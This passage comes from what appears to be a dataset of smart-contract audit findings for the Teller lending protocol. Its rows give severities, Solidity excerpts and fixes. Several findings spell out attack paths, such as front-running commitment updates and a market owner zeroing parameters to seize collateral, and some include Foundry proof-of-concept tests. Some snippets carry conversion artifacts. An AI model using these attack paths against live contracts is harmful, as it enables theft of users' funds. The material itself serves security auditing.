collateral from the created escrow of a bid that has been successfully repaid.\\n * @param _bidId The id of the bid to withdraw collateral for.\\n */\\n function withdraw(uint256 _bidId) external {\\n BidState bidState = tellerV2.getBidState(_bidId);\\n console2.log(""WITHDRAW %d"", uint256(bidState));\\n if (bidState == BidState.PAID) {\\n _withdraw(_bidId, tellerV2.getLoanBorrower(_bidId));\\n } else if (tellerV2.isLoanDefaulted(_bidId)) { audit\\n _withdraw(_bidId, tellerV2.getLoanLender(_bidId));\\n emit CollateralClaimed(_bidId);\\n } else {\\n revert(""collateral cannot be withdrawn"");\\n }\\n }\\n```\\n" +The calculation time methods of `calculateNextDueDate` and `_canLiquidateLoan` are inconsistent,medium,"The calculation time methods of `calculateNextDueDate` and `_canLiquidateLoan` are inconsistent\\n```\\nFile: TellerV2.sol\\n 854 function calculateNextDueDate(uint256 _bidId)\\n 855 public\\n 856 view\\n 857 returns (uint32 dueDate_)\\n 858 {\\n 859 Bid storage bid = bids[_bidId];\\n 860 if (bids[_bidId].state != BidState.ACCEPTED) return dueDate_;\\n 861\\n 862 uint32 lastRepaidTimestamp = lastRepaidTimestamp(_bidId);\\n 863\\n 864 // Calculate due date if payment cycle is set to monthly\\n 865 if (bidPaymentCycleType[_bidId] == PaymentCycleType.Monthly) {\\n 866 // Calculate the cycle number the last repayment was made\\n 867 uint256 lastPaymentCycle = BPBDTL.diffMonths(\\n 868 bid.loanDetails.acceptedTimestamp,\\n 869 \\n```\\n\\nThe `calculateNextDueDate` function is used by the borrower to query the date of the next repayment. Generally speaking, the borrower will think that as long as the repayment is completed at this point in time, the collateral will not be liquidated.\\n```\\nFile: TellerV2.sol\\n 953 function _canLiquidateLoan(uint256 _bidId, uint32 _liquidationDelay)\\n 954 internal\\n 955 view\\n 956 returns (bool)\\n 957 {\\n 958 Bid storage bid = bids[_bidId];\\n 959\\n 960 // Make sure loan cannot be liquidated if it is not active\\n 961 if (bid.state != BidState.ACCEPTED) return false;\\n 962\\n 963 if (bidDefaultDuration[_bidId] == 0) return false;\\n 964\\n 965 return (uint32(block.timestamp) -\\n 966 _liquidationDelay -\\n 967 lastRepaidTimestamp(_bidId) >\\n 968 bidDefaultDuration[_bidId]);\\n 969 }\\n```\\n\\nHowever, when the `_canLiquidateLoan` function actually judges whether it can be liquidated, the time calculation mechanism is completely different from that of `calculateNextDueDate` function, which may cause that if the time point calculated by `_canLiquidateLoan` is earlier than the time point of `calculateNextDueDate` function, the borrower may also be liquidated in the case of legal repayment.\\nBorrowers cannot query the specific liquidation time point, but can only query whether they can be liquidated through the `isLoanDefaulted` function or `isLoanLiquidateable` function. When they query that they can be liquidated, they may have already been liquidated.",It is recommended to verify that the liquidation time point cannot be shorter than the repayment period and allow users to query the exact liquidation time point.,Borrowers may be liquidated if repayments are made on time.,"```\\nFile: TellerV2.sol\\n 854 function calculateNextDueDate(uint256 _bidId)\\n 855 public\\n 856 view\\n 857 returns (uint32 dueDate_)\\n 858 {\\n 859 Bid storage bid = bids[_bidId];\\n 860 if (bids[_bidId].state != BidState.ACCEPTED) return dueDate_;\\n 861\\n 862 uint32 lastRepaidTimestamp = lastRepaidTimestamp(_bidId);\\n 863\\n 864 // Calculate due date if payment cycle is set to monthly\\n 865 if (bidPaymentCycleType[_bidId] == PaymentCycleType.Monthly) {\\n 866 // Calculate the cycle number the last repayment was made\\n 867 uint256 lastPaymentCycle = BPBDTL.diffMonths(\\n 868 bid.loanDetails.acceptedTimestamp,\\n 869 \\n```\\n" +updateCommitmentBorrowers does not delete all existing users,medium,"The lender can update the list of borrowers by calling `LenderCommitmentForwarder.updateCommitmentBorrowers`. The list of borrowers is EnumerableSetUpgradeable.AddressSet that is a complex structure containing mapping. Using the `delete` keyword to `delete` this structure will not erase the mapping inside it. Let's look at the code of this function.\\n```\\nmapping(uint256 => EnumerableSetUpgradeable.AddressSet)\\n internal commitmentBorrowersList;\\n \\nfunction updateCommitmentBorrowers(\\n uint256 _commitmentId,\\n address[] calldata _borrowerAddressList\\n ) public commitmentLender(_commitmentId) {\\n delete commitmentBorrowersList[_commitmentId];\\n _addBorrowersToCommitmentAllowlist(_commitmentId, _borrowerAddressList);\\n }\\n```\\n\\nI wrote a similar function to prove the problem.\\n```\\nusing EnumerableSet for EnumerableSet.AddressSet;\\n mapping(uint256 => EnumerableSet.AddressSet) internal users;\\n \\n function test_deleteEnumerableSet() public {\\n uint256 id = 1;\\n address[] memory newUsers = new address[](2);\\n newUsers[0] = address(0x1);\\n newUsers[1] = address(0x2);\\n\\n for (uint256 i = 0; i < newUsers.length; i++) {\\n users[id].add(newUsers[i]);\\n }\\n delete users[id];\\n newUsers[0] = address(0x3);\\n newUsers[1] = address(0x4);\\n for (uint256 i = 0; i < newUsers.length; i++) {\\n users[id].add(newUsers[i]);\\n }\\n bool exist = users[id].contains(address(0x1));\\n if(exist) {\\n emit log_string(""address(0x1) exist"");\\n }\\n exist = users[id].contains(address(0x2));\\n if(exist) {\\n emit log_string(""address(0x2) exist"");\\n }\\n }\\n/*\\n[PASS] test_deleteEnumerableSet() (gas: 174783)\\nLogs:\\n address(0x1) exist\\n address(0x2) exist\\n*/\\n```\\n","In order to clean an `EnumerableSet`, you can either remove all elements one by one or create a fresh instance using an array of `EnumerableSet`.",The deleted Users can still successfully call `LenderCommitmentForwarder.acceptCommitment` to get a loan.,"```\\nmapping(uint256 => EnumerableSetUpgradeable.AddressSet)\\n internal commitmentBorrowersList;\\n \\nfunction updateCommitmentBorrowers(\\n uint256 _commitmentId,\\n address[] calldata _borrowerAddressList\\n ) public commitmentLender(_commitmentId) {\\n delete commitmentBorrowersList[_commitmentId];\\n _addBorrowersToCommitmentAllowlist(_commitmentId, _borrowerAddressList);\\n }\\n```\\n" +"If the collateral is a fee-on-transfer token, repayment will be blocked",medium,"As we all know, some tokens will deduct fees when transferring token. In this way, the actual amount of token received by the receiver will be less than the amount sent. If the collateral is this type of token, the amount of collateral recorded in the contract will bigger than the actual amount. When the borrower repays the loan, the amount of collateral withdrawn will be insufficient, causing tx revert.\\nThe `_bidCollaterals` mapping of `CollateralManager` records the `CollateralInfo` of each bidId. This structure records the collateral information provided by the user when creating a bid for a loan. A lender can accept a loan by calling `TellerV2.lenderAcceptBid` that will eventually transfer the user's collateral from the user address to the CollateralEscrowV1 contract corresponding to the loan. The whole process will deduct fee twice.\\n```\\n//CollateralManager.sol\\nfunction _deposit(uint256 _bidId, Collateral memory collateralInfo)\\n internal\\n virtual\\n {\\n // rest of code// rest of code\\n // Pull collateral from borrower & deposit into escrow\\n if (collateralInfo._collateralType == CollateralType.ERC20) {\\n IERC20Upgradeable(collateralInfo._collateralAddress).transferFrom( //transferFrom first time\\n borrower,\\n address(this),\\n collateralInfo._amount\\n );\\n IERC20Upgradeable(collateralInfo._collateralAddress).approve(\\n escrowAddress,\\n collateralInfo._amount\\n );\\n collateralEscrow.depositAsset( //transferFrom second time\\n CollateralType.ERC20,\\n collateralInfo._collateralAddress,\\n collateralInfo._amount, //this value is from user's input\\n 0\\n );\\n }\\n // rest of code// rest of code\\n }\\n```\\n\\nThe amount of collateral recorded by the CollateralEscrowV1 contract is equal to the amount originally submitted by the user.\\nWhen the borrower repays the loan, `collateralManager.withdraw` will be triggered. This function internally calls `CollateralEscrowV1.withdraw`. Since the balance of the collateral in the CollateralEscrowV1 contract is less than the amount to be withdrawn, the entire transaction reverts.\\n```\\n//CollateralEscrowV1.sol\\nfunction _withdrawCollateral(\\n Collateral memory _collateral,\\n address _collateralAddress,\\n uint256 _amount,\\n address _recipient\\n ) internal {\\n // Withdraw ERC20\\n if (_collateral._collateralType == CollateralType.ERC20) {\\n IERC20Upgradeable(_collateralAddress).transfer( //revert\\n _recipient,\\n _collateral._amount //_collateral.balanceOf(address(this)) < _collateral._amount\\n );\\n }\\n // rest of code// rest of code\\n }\\n```\\n","Two ways to fix this issue.\\nThe `afterBalance-beforeBalance` method should be used when recording the amount of collateral.\\n` --- a/teller-protocol-v2/packages/contracts/contracts/escrow/CollateralEscrowV1.sol\\n +++ b/teller-protocol-v2/packages/contracts/contracts/escrow/CollateralEscrowV1.sol\\n @@ -165,7 +165,7 @@ contract CollateralEscrowV1 is OwnableUpgradeable, ICollateralEscrowV1 {\\n if (_collateral._collateralType == CollateralType.ERC20) {\\n IERC20Upgradeable(_collateralAddress).transfer(\\n _recipient,\\n - _collateral._amount\\n + IERC20Upgradeable(_collateralAddress).balanceOf(address(this))\\n );\\n }`","The borrower's collateral is stuck in the instance of CollateralEscrowV1. Non-professional users will never know that they need to manually transfer some collateral into CollateralEscrowV1 to successfully repay.\\nThis issue blocked the user's repayment, causing the loan to be liquidated.\\nThe liquidator will not succeed by calling `TellerV2.liquidateLoanFull`.","```\\n//CollateralManager.sol\\nfunction _deposit(uint256 _bidId, Collateral memory collateralInfo)\\n internal\\n virtual\\n {\\n // rest of code// rest of code\\n // Pull collateral from borrower & deposit into escrow\\n if (collateralInfo._collateralType == CollateralType.ERC20) {\\n IERC20Upgradeable(collateralInfo._collateralAddress).transferFrom( //transferFrom first time\\n borrower,\\n address(this),\\n collateralInfo._amount\\n );\\n IERC20Upgradeable(collateralInfo._collateralAddress).approve(\\n escrowAddress,\\n collateralInfo._amount\\n );\\n collateralEscrow.depositAsset( //transferFrom second time\\n CollateralType.ERC20,\\n collateralInfo._collateralAddress,\\n collateralInfo._amount, //this value is from user's input\\n 0\\n );\\n }\\n // rest of code// rest of code\\n }\\n```\\n" +LenderCommitmentForwarder#updateCommitment can be front-run by malicious borrower to cause lender to over-commit funds,medium,"This is the same idea as approve vs increaseAlllowance. updateCommitment is a bit worse though because there are more reason why a user may wish to update their commitment (expiration, collateral ratio, interest rate, etc).\\nLenderCommitmentForwarder.sol#L212-L222\\n```\\n require(\\n _commitment.principalTokenAddress ==\\n commitments[_commitmentId].principalTokenAddress,\\n ""Principal token address cannot be updated.""\\n );\\n require(\\n _commitment.marketId == commitments[_commitmentId].marketId,\\n ""Market Id cannot be updated.""\\n );\\n\\n commitments[_commitmentId] = _commitment;\\n```\\n\\nLenderCommitmentForwarder#updateCommitment overwrites ALL of the commitment data. This means that even if a user is calling it to update even one value the maxPrincipal will reset, opening up the following attack vector:\\nUser A creates a commitment for 100e6 USDC lending against ETH\\nUser A's commitment is close to expiry so they call to update their commitment with a new expiration\\nUser B sees this update and front-runs it with a loan against the commitment for 100e6 USDC\\nUser A's commitment is updated and the amount is set back to 100e6 USDC\\nUser B takes out another loan for 100e6 USDC\\nUser A has now loaned out 200e6 USDC when they only meant to loan 100e6 USDC",Create a function that allows users to extend expiry while keeping amount unchanged. Additionally create a function similar to increaseApproval which increase amount instead of overwriting amount.,Commitment is abused to over-commit lender,"```\\n require(\\n _commitment.principalTokenAddress ==\\n commitments[_commitmentId].principalTokenAddress,\\n ""Principal token address cannot be updated.""\\n );\\n require(\\n _commitment.marketId == commitments[_commitmentId].marketId,\\n ""Market Id cannot be updated.""\\n );\\n\\n commitments[_commitmentId] = _commitment;\\n```\\n" +Bid submission vulnerable to market parameters changes,medium,"The details for the audit state:\\nMarket owners should NOT be able to race-condition attack borrowers or lenders by changing market settings while bids are being submitted or accepted (while tx are in mempool). Care has been taken to ensure that this is not possible (similar in theory to sandwich attacking but worse as if possible it could cause unexpected and non-consentual interest rate on a loan) and further-auditing of this is welcome.\\nHowever, there is little protection in place to protect the submitter of a bid from changes in market parameters.\\nIn _submitBid(), certain bid parameters are taken from the marketRegistry:\\n```\\n function _submitBid(// rest of code)\\n // rest of code\\n (bid.terms.paymentCycle, bidPaymentCycleType[bidId]) = marketRegistry\\n .getPaymentCycle(_marketplaceId);\\n\\n bid.terms.APR = _APR;\\n\\n bidDefaultDuration[bidId] = marketRegistry.getPaymentDefaultDuration(\\n _marketplaceId\\n );\\n\\n bidExpirationTime[bidId] = marketRegistry.getBidExpirationTime(\\n _marketplaceId\\n );\\n\\n bid.paymentType = marketRegistry.getPaymentType(_marketplaceId);\\n \\n bid.terms.paymentCycleAmount = V2Calculations\\n .calculatePaymentCycleAmount(\\n bid.paymentType,\\n bidPaymentCycleType[bidId],\\n _principal,\\n _duration,\\n bid.terms.paymentCycle,\\n _APR\\n );\\n // rest of code\\n```\\n","Take every single parameters as input of `_submitBid()` (including fee percents) and compare them to the values in `marketRegistry` to make sure borrower agrees with them, revert if they differ.","If market parameters are changed in between the borrower submitting a bid transaction and the transaction being applied, borrower may be subject to changes in `bidDefaultDuration`, `bidExpirationTime`, `paymentType`, `paymentCycle`, `bidPaymentCycleType` and `paymentCycleAmount`.\\nThat is, the user may be committed to the bid for longer / shorter than expected. They may have a longer / shorter default duration (time for the loan being considered defaulted / eligible for liquidation). They have un-provisioned for payment type and cycle parameters.\\nI believe most of this will have a medium impact on borrower (mild inconveniences / resolvable by directly repaying the loan) if the market owner is not evil and adapting the parameters reasonably.\\nAn evil market owner can set the value of `bidDefaultDuration` and `paymentCycle` very low (0) so that the loan will default immediately. It can then accept the bid, make user default immediately, and liquidate the loan to steal the user's collateral. This results in a loss of collateral for the borrower.","```\\n function _submitBid(// rest of code)\\n // rest of code\\n (bid.terms.paymentCycle, bidPaymentCycleType[bidId]) = marketRegistry\\n .getPaymentCycle(_marketplaceId);\\n\\n bid.terms.APR = _APR;\\n\\n bidDefaultDuration[bidId] = marketRegistry.getPaymentDefaultDuration(\\n _marketplaceId\\n );\\n\\n bidExpirationTime[bidId] = marketRegistry.getBidExpirationTime(\\n _marketplaceId\\n );\\n\\n bid.paymentType = marketRegistry.getPaymentType(_marketplaceId);\\n \\n bid.terms.paymentCycleAmount = V2Calculations\\n .calculatePaymentCycleAmount(\\n bid.paymentType,\\n bidPaymentCycleType[bidId],\\n _principal,\\n _duration,\\n bid.terms.paymentCycle,\\n _APR\\n );\\n // rest of code\\n```\\n" +EMI last payment not handled perfectly could lead to borrower losing collaterals,medium,"The ternary logic of `calculateAmountOwed()` could have the last EMI payment under calculated, leading to borrower not paying the owed principal and possibly losing the collaterals if care has not been given to.\\nSupposing Bob has a loan duration of 100 days such that the payment cycle is evenly spread out, i.e payment due every 10 days, here is a typical scenario:\\nBob has been making his payment due on time to avoid getting marked delinquent. For the last payment due, Bob decides to make it 5 minutes earlier just to make sure he will not miss it.\\nHowever, `duePrincipal_` ends up assigned the minimum of `owedAmount - interest_` and `owedPrincipal_`, where the former is chosen since `oweTime` is less than _bid.terms.paymentCycle:\\n```\\n } else {\\n // Default to PaymentType.EMI\\n // Max payable amount in a cycle\\n // NOTE: the last cycle could have less than the calculated payment amount\\n uint256 maxCycleOwed = isLastPaymentCycle\\n ? owedPrincipal_ + interest_\\n : _bid.terms.paymentCycleAmount;\\n\\n // Calculate accrued amount due since last repayment\\n uint256 owedAmount = (maxCycleOwed * owedTime) /\\n _bid.terms.paymentCycle;\\n duePrincipal_ = Math.min(owedAmount - interest_, owedPrincipal_);\\n }\\n```\\n\\nHence, in `_repayLoan()`, `paymentAmount >= _owedAmount` equals false failing to close the loan to have the collaterals returned to Bob:\\n```\\n if (paymentAmount >= _owedAmount) {\\n paymentAmount = _owedAmount;\\n bid.state = BidState.PAID;\\n\\n // Remove borrower's active bid\\n _borrowerBidsActive[bid.borrower].remove(_bidId);\\n\\n // If loan is is being liquidated and backed by collateral, withdraw and send to borrower\\n if (_shouldWithdrawCollateral) {\\n collateralManager.withdraw(_bidId);\\n }\\n\\n emit LoanRepaid(_bidId);\\n```\\n\\nWhile lingering and not paying too much attention to the collateral still in escrow, Bob presumes his loan is now settled.\\nNext, Alex the lender has been waiting for this golden opportunity and proceeds to calling `CollateralManager.withdraw()` to claim all collaterals as soon as the loan turns defaulted.","Consider refactoring the affected ternary logic as follows:\\n```\\n } else {\\n// Add the line below\\n duePrincipal = isLastPaymentCycle\\n// Add the line below\\n ? owedPrincipal\\n// Add the line below\\n : (_bid.terms.paymentCycleAmount * owedTime) / _bid.terms.paymentCycle;\\n\\n // Default to PaymentType.EMI\\n // Max payable amount in a cycle\\n // NOTE: the last cycle could have less than the calculated payment amount\\n// Remove the line below\\n uint256 maxCycleOwed = isLastPaymentCycle\\n// Remove the line below\\n ? owedPrincipal_ // Add the line below\\n interest_\\n// Remove the line below\\n : _bid.terms.paymentCycleAmount;\\n\\n // Calculate accrued amount due since last repayment\\n// Remove the line below\\n uint256 owedAmount = (maxCycleOwed * owedTime) /\\n// Remove the line below\\n _bid.terms.paymentCycle;\\n// Remove the line below\\n duePrincipal_ = Math.min(owedAmount // Remove the line below\\n interest_, owedPrincipal_);\\n }\\n```\\n",Bob ended up losing all collaterals for the sake of the minute amount of loan unpaid whereas Alex receives almost all principal plus interests on top of the collaterals.,"```\\n } else {\\n // Default to PaymentType.EMI\\n // Max payable amount in a cycle\\n // NOTE: the last cycle could have less than the calculated payment amount\\n uint256 maxCycleOwed = isLastPaymentCycle\\n ? owedPrincipal_ + interest_\\n : _bid.terms.paymentCycleAmount;\\n\\n // Calculate accrued amount due since last repayment\\n uint256 owedAmount = (maxCycleOwed * owedTime) /\\n _bid.terms.paymentCycle;\\n duePrincipal_ = Math.min(owedAmount - interest_, owedPrincipal_);\\n }\\n```\\n" +defaulting doesn't change the state of the loan,medium,"The lender can claim the borrowers collateral in case they have defaulted on their payments. This however does not change the state of the loan so the borrower can continue making payments to the lender even though the loan is defaulted.\\n```\\nFile: CollateralManager.sol\\n\\n } else if (tellerV2.isLoanDefaulted(_bidId)) {\\n _withdraw(_bidId, tellerV2.getLoanLender(_bidId)); // sends collateral to lender\\n emit CollateralClaimed(_bidId);\\n } else {\\n```\\n\\nSince this is in `CollateralManager` nothing is updating the state kept in `TellerV2` which will still be `ACCEPTED`. The lender could still make payments (in vain).",Remove the possibility for the lender to default the loan in `CollateralManager`. Move defaulting to `TellerV2` so it can properly close the loan.,"The borrower can continue paying unknowing that the loan is defaulted. The lender could, given a defaulted loan, see that the lender is trying to save their loan and front run the late payment with a seize of collateral. Then get both the late payment and the collateral. This is quite an unlikely scenario though.\\nThe loan will also be left active since even if the borrower pays the `withdraw` of collateral will fail since the collateral is no longer there.","```\\nFile: CollateralManager.sol\\n\\n } else if (tellerV2.isLoanDefaulted(_bidId)) {\\n _withdraw(_bidId, tellerV2.getLoanLender(_bidId)); // sends collateral to lender\\n emit CollateralClaimed(_bidId);\\n } else {\\n```\\n" +bids can be created against markets that doesn't exist,medium,"Bids can be created against markets that does not yet exist. When this market is created, the bid can be accepted but neither defaulted/liquidated nor repaid.\\nThere's no verification that the market actually exists when submitting a bid. Hence a user could submit a bid for a non existing market.\\nFor it to not revert it must have 0% APY and the bid cannot be accepted until a market exists.\\nHowever, when this market is created the bid can be accepted. Then the loan would be impossible to default/liquidate:\\n```\\nFile: TellerV2.sol\\n\\n if (bidDefaultDuration[_bidId] == 0) return false;\\n```\\n\\nSince `bidDefaultDuration[_bidId]` will be `0`\\nAny attempt to repay will revert due to division by 0:\\n```\\nFile: libraries/V2Calculations.sol\\n\\n uint256 owedAmount = (maxCycleOwed * owedTime) /\\n _bid.terms.paymentCycle; \\n```\\n\\nSince `_bid.terms.paymentCycle` will also be `0` (and it will always end up in this branch since `PaymentType` will be EMI (0)).\\nHence the loan can never be closed.\\nPoC:\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity ^0.8.0;\\n\\nimport { UpgradeableBeacon } from ""@openzeppelin/contracts/proxy/beacon/UpgradeableBeacon.sol"";\\n\\nimport { TellerV2 } from ""../contracts/TellerV2.sol"";\\nimport { CollateralManager } from ""../contracts/CollateralManager.sol"";\\nimport { LenderCommitmentForwarder } from ""../contracts/LenderCommitmentForwarder.sol"";\\nimport { CollateralEscrowV1 } from ""../contracts/escrow/CollateralEscrowV1.sol"";\\nimport { MarketRegistry } from ""../contracts/MarketRegistry.sol"";\\n\\nimport { ReputationManagerMock } from ""../contracts/mock/ReputationManagerMock.sol"";\\nimport { LenderManagerMock } from ""../contracts/mock/LenderManagerMock.sol"";\\nimport { TellerASMock } from ""../contracts/mock/TellerASMock.sol"";\\n\\nimport {TestERC20Token} from ""./tokens/TestERC20Token.sol"";\\n\\nimport ""lib/forge-std/src/Test.sol"";\\nimport ""lib/forge-std/src/StdAssertions.sol"";\\n\\ncontract LoansTest is Test {\\n MarketRegistry marketRegistry;\\n TellerV2 tellerV2;\\n \\n TestERC20Token principalToken;\\n\\n address alice = address(0x1111);\\n address bob = address(0x2222);\\n address owner = address(0x3333);\\n\\n function setUp() public {\\n tellerV2 = new TellerV2(address(0));\\n\\n marketRegistry = new MarketRegistry();\\n TellerASMock tellerAs = new TellerASMock();\\n marketRegistry.initialize(tellerAs);\\n\\n LenderCommitmentForwarder lenderCommitmentForwarder = \\n new LenderCommitmentForwarder(address(tellerV2),address(marketRegistry));\\n CollateralManager collateralManager = new CollateralManager();\\n collateralManager.initialize(address(new UpgradeableBeacon(address(new CollateralEscrowV1()))),\\n address(tellerV2));\\n address rm = address(new ReputationManagerMock());\\n address lm = address(new LenderManagerMock());\\n tellerV2.initialize(0, address(marketRegistry), rm, address(lenderCommitmentForwarder),\\n address(collateralManager), lm);\\n\\n principalToken = new TestERC20Token(""Principal Token"", ""PRIN"", 12e18, 18);\\n }\\n\\n function testSubmitBidForNonExistingMarket() public {\\n uint256 amount = 12e18;\\n principalToken.transfer(bob,amount);\\n\\n vm.prank(bob);\\n principalToken.approve(address(tellerV2),amount);\\n\\n // alice places bid on non-existing market\\n vm.prank(alice);\\n uint256 bidId = tellerV2.submitBid(\\n address(principalToken),\\n 1, // non-existing right now\\n amount,\\n 360 days,\\n 0, // any APY != 0 will cause revert on div by 0\\n """",\\n alice\\n );\\n\\n // bid cannot be accepted before market\\n vm.expectRevert(); // div by 0\\n vm.prank(bob);\\n tellerV2.lenderAcceptBid(bidId);\\n\\n vm.startPrank(owner);\\n uint256 marketId = marketRegistry.createMarket(\\n owner,\\n 30 days,\\n 30 days,\\n 1 days,\\n 0,\\n false,\\n false,\\n """"\\n );\\n marketRegistry.setMarketFeeRecipient(marketId, owner);\\n vm.stopPrank();\\n\\n // lender takes bid\\n vm.prank(bob);\\n tellerV2.lenderAcceptBid(bidId);\\n\\n // should be liquidatable now\\n vm.warp(32 days);\\n\\n // loan cannot be defaulted/liquidated\\n assertFalse(tellerV2.isLoanDefaulted(bidId));\\n assertFalse(tellerV2.isLoanLiquidateable(bidId));\\n\\n vm.startPrank(alice);\\n principalToken.approve(address(tellerV2),12e18);\\n\\n // and loan cannot be repaid\\n vm.expectRevert(); // division by 0\\n tellerV2.repayLoanFull(bidId);\\n vm.stopPrank();\\n }\\n}\\n```\\n","When submitting a bid, verify that the market exists.","This will lock any collateral forever since there's no way to retrieve it. For this to happen accidentally a borrower would have to create a bid for a non existing market with 0% APY though.\\nThis could also be used to lure lenders since the loan cannot be liquidated/defaulted. This might be difficult since the APY must be 0% for the bid to be created. Also, this will lock any collateral provided by the borrower forever.\\nDue to these circumstances I'm categorizing this as medium.",```\\nFile: TellerV2.sol\\n\\n if (bidDefaultDuration[_bidId] == 0) return false;\\n```\\n +"last repayments are calculated incorrectly for ""irregular"" loan durations",medium,"When taking a loan, a borrower expects that at the end of each payment cycle they should pay `paymentCycleAmount`. This is not true for loans that are not a multiple of `paymentCycle`.\\nImagine a loan of `1000` that is taken for 2.5 payment cycles (skip interest to keep calculations simple).\\nA borrower would expect to pay `400` + `400` + `200`\\nThis holds true for the first installment.\\nBut lets look at what happens at the second installment, here's the calculation of what is to pay in V2Calculations.sol:\\n```\\nFile: libraries/V2Calculations.sol\\n\\n 93: // Cast to int265 to avoid underflow errors (negative means loan duration has passed)\\n 94: int256 durationLeftOnLoan = int256(\\n 95: uint256(_bid.loanDetails.loanDuration)\\n 96: ) -\\n 97: (int256(_timestamp) -\\n 98: int256(uint256(_bid.loanDetails.acceptedTimestamp)));\\n 99: bool isLastPaymentCycle = durationLeftOnLoan <\\n int256(uint256(_bid.terms.paymentCycle)) || // Check if current payment cycle is within or beyond the last one\\n owedPrincipal_ + interest_ <= _bid.terms.paymentCycleAmount; // Check if what is left to pay is less than the payment cycle amount\\n```\\n\\nSimplified the first calculation says `timeleft = loanDuration - (now - acceptedTimestamp)` and then if `timeleft < paymentCycle` we are within the last payment cycle.\\nThis isn't true for loan durations that aren't multiples of the payment cycles. This code says the last payment cycle is when you are one payment cycle from the end of the loan. Which is not the same as last payment cycle as my example above shows.\\nPoC:\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity ^0.8.0;\\n\\nimport { UpgradeableBeacon } from ""@openzeppelin/contracts/proxy/beacon/UpgradeableBeacon.sol"";\\n\\nimport { AddressUpgradeable } from ""@openzeppelin/contracts-upgradeable/utils/AddressUpgradeable.sol"";\\n\\nimport { TellerV2 } from ""../contracts/TellerV2.sol"";\\nimport { Payment } from ""../contracts/TellerV2Storage.sol"";\\nimport { CollateralManager } from ""../contracts/CollateralManager.sol"";\\nimport { LenderCommitmentForwarder } from ""../contracts/LenderCommitmentForwarder.sol"";\\nimport { CollateralEscrowV1 } from ""../contracts/escrow/CollateralEscrowV1.sol"";\\nimport { Collateral, CollateralType } from ""../contracts/interfaces/escrow/ICollateralEscrowV1.sol"";\\n\\nimport { ReputationManagerMock } from ""../contracts/mock/ReputationManagerMock.sol"";\\nimport { LenderManagerMock } from ""../contracts/mock/LenderManagerMock.sol"";\\nimport { MarketRegistryMock } from ""../contracts/mock/MarketRegistryMock.sol"";\\n\\nimport {TestERC20Token} from ""./tokens/TestERC20Token.sol"";\\n\\nimport ""lib/forge-std/src/Test.sol"";\\n\\ncontract LoansTest is Test {\\n using AddressUpgradeable for address;\\n\\n MarketRegistryMock marketRegistry;\\n\\n TellerV2 tellerV2;\\n LenderCommitmentForwarder lenderCommitmentForwarder;\\n CollateralManager collateralManager;\\n \\n TestERC20Token principalToken;\\n\\n address alice = address(0x1111);\\n\\n uint256 marketId = 0;\\n\\n function setUp() public {\\n tellerV2 = new TellerV2(address(0));\\n\\n marketRegistry = new MarketRegistryMock();\\n\\n lenderCommitmentForwarder = new LenderCommitmentForwarder(address(tellerV2),address(marketRegistry));\\n \\n collateralManager = new CollateralManager();\\n collateralManager.initialize(address(new UpgradeableBeacon(address(new CollateralEscrowV1()))), address(tellerV2));\\n\\n address rm = address(new ReputationManagerMock());\\n address lm = address(new LenderManagerMock());\\n tellerV2.initialize(0, address(marketRegistry), rm, address(lenderCommitmentForwarder), address(collateralManager), lm);\\n\\n marketRegistry.setMarketOwner(address(this));\\n marketRegistry.setMarketFeeRecipient(address(this));\\n\\n tellerV2.setTrustedMarketForwarder(marketId,address(lenderCommitmentForwarder));\\n\\n principalToken = new TestERC20Token(""Principal Token"", ""PRIN"", 12e18, 18);\\n }\\n\\n\\n function testLoanInstallmentsCalculatedIncorrectly() public {\\n // payment cycle is 1000 in market registry\\n \\n uint256 amount = 1000;\\n principalToken.transfer(alice,amount);\\n \\n vm.startPrank(alice);\\n principalToken.approve(address(tellerV2),2*amount);\\n uint256 bidId = tellerV2.submitBid(\\n address(principalToken),\\n marketId,\\n amount,\\n 2500, // 2.5 payment cycles\\n 0, // 0 interest to make calculations easier\\n """",\\n alice\\n );\\n tellerV2.lenderAcceptBid(bidId);\\n vm.stopPrank();\\n\\n // jump to first payment cycle end\\n vm.warp(block.timestamp + 1000);\\n Payment memory p = tellerV2.calculateAmountDue(bidId);\\n assertEq(400,p.principal);\\n\\n // borrower pays on time\\n vm.prank(alice);\\n tellerV2.repayLoanMinimum(bidId);\\n\\n // jump to second payment cycle\\n vm.warp(block.timestamp + 1000);\\n p = tellerV2.calculateAmountDue(bidId);\\n\\n // should be 400 but is full loan\\n assertEq(600,p.principal);\\n }\\n}\\n```\\n\\nThe details of this finding are out of scope but since it makes `TellerV2`, in scope, behave unexpectedly I believe this finding to be in scope.","First I thought that you could remove the `lastPaymentCycle` calculation all together. I tried that and then also tested what happened with ""irregular"" loans with interest.\\nThen I found this in the EMI calculation:\\n```\\nFile: libraries/NumbersLib.sol\\n\\n uint256 n = Math.ceilDiv(loanDuration, cycleDuration);\\n```\\n\\nEMI, which is designed for mortgages, assumes the payments is a discrete number of the same amortization essentially. I.e they don't allow ""partial"" periods at the end, because that doesn't make sense for a mortgage.\\nIn Teller this is allowed which causes some issues with the EMI calculation since the above row will always round up to a full number of payment periods. If you also count interest, which triggers the EMI calculation: The lender, in an ""irregular"" loan duration, would get less per installment up to the last one which would be bigger. The funds would all be paid with the correct interest in the end just not in the expected amounts.\\nMy recommendation now is:\\neither\\ndon't allow loan durations that aren't a multiple of the period, at least warn about it UI-wise, no one will lose any money but the installments might be split in unexpected amounts.\\nDo away with EMI all together as DeFi loans aren't the same as mortgages. The defaulting/liquidation logic only cares about time since last payment.\\nDo more math to make EMI work with irregular loan durations. This nerd sniped me:\\nMore math:\\nIn the middle we have an equation which describes the owed amount at a time $P_n$:\\n$$P_n=Pt^n-E\\frac{(t^n-1)}{t-n}$$ where $t=1+r$ and $r$ is the monthly interest rate ($apy*C/year$).\\nNow, from here, we want to calculate the loan at a time $P_{n + \\Delta}$:\\n$$P_{n + \\Delta}=Pt^nt_\\Delta-E\\frac{t^n-1}{t-1}t_\\Delta-kE$$\\nWhere $k$ is $c/C$ i.e. the ratio of partial cycle compared to a full cycle.\\nSame with $t_\\Delta$ which is $1+r_\\Delta$, ($r_\\Delta$ is also equal to $kr$, ratio of partial cycle rate to full cycle rate, which we'll use later).\\nReorganize to get $E$ from above:\\n$$ E = P r \\frac{t^nt_\\Delta}{t_\\Delta \\frac{t^n-1}{t-1} + k} $$\\nNow substitute in $1+r$ in place of $t$ and $1+r_\\Delta$ instead of $t_\\Delta$ and multiply both numerator and denominator with $r$:\\n$$ E = P \\frac{r (1+r)^n(1+r_\\Delta)}{(1+r_\\Delta)((1+r)^n - 1) + kr} 